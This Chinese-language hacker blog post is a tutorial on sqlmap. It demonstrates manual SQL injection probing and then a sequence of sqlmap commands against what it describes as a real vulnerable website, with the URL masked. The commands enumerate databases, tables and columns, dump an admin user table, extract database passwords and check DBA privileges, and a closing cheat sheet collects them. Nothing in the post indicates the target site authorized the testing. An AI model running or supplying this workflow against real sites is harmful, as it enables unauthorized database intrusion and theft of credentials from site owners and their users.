危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2308 浏览21675619

全方位解剖sqlmap常用命令

sqlmap,一款强大的注入工具,介绍、安装什么的,我就不多说了。


先看看使用帮助



这里拿我先前找到的一个存在SQL注入漏洞的网站进行演示(敏感数据已打码)


目标URL:http://www.xxx.com/xx.xxx?id=5


手工检测SQL注入点,我们只需简单的两三条语句便可以检测其是否存在SQL注入


1. 在目标URL后加一个单引号,发现有SQL报错回显;


http://http://www.xxx.com/xx.xxx?id=5'


2. 分别在目标URL后面加上 and 1=1 和 and 1=2 进行访问,会发现显示页面不一样,也就说明有问题


3. 也可以直接使用burpsuite等抓包工具对有参数提交的地方抓取其数据包,直接放sqlmap里面跑。


好了,既然发现SQL注入的问题存在了,开始进行注入


sqlmap.py -u http://www.xxx.com/xx.xxx?id=5


//使用sqlmap工具进行扫描,下面扫出了几个 Payload



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"–dbs


//获取数据库



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-db


//获取当前数据库名



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-user


//获取当前数据库的用户名



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables


//获取数据库的表名



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables -D r3550c17g3


//获取指定数据库中的表名



sqlmap.py -u "" --columns -Tmanage_user -D r3550c17g3


//获取指定表中的列名



sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--dump -C manage_name -T manage_user -D r3550c17g3


//获取指定列名中的字段



总  结


常用语句:


sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"


sqlmap.py -u "[URL]" –dbs    //获取数据库


sqlmap.py -u "[URL]" --current-db    //获取当前数据库名


sqlmap.py -u "[URL]" --current-user    //获取当前数据库的用户名


sqlmap.py -u "[URL]" --tables    //获取数据的所有表名


sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的所有表名


sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段


sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段


sqlmap.py -u "[URL]" --privileges     //查看当前数据库的用户权限


sqlmap.py -u "[URL]" --password    //爆数据库的密码


sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限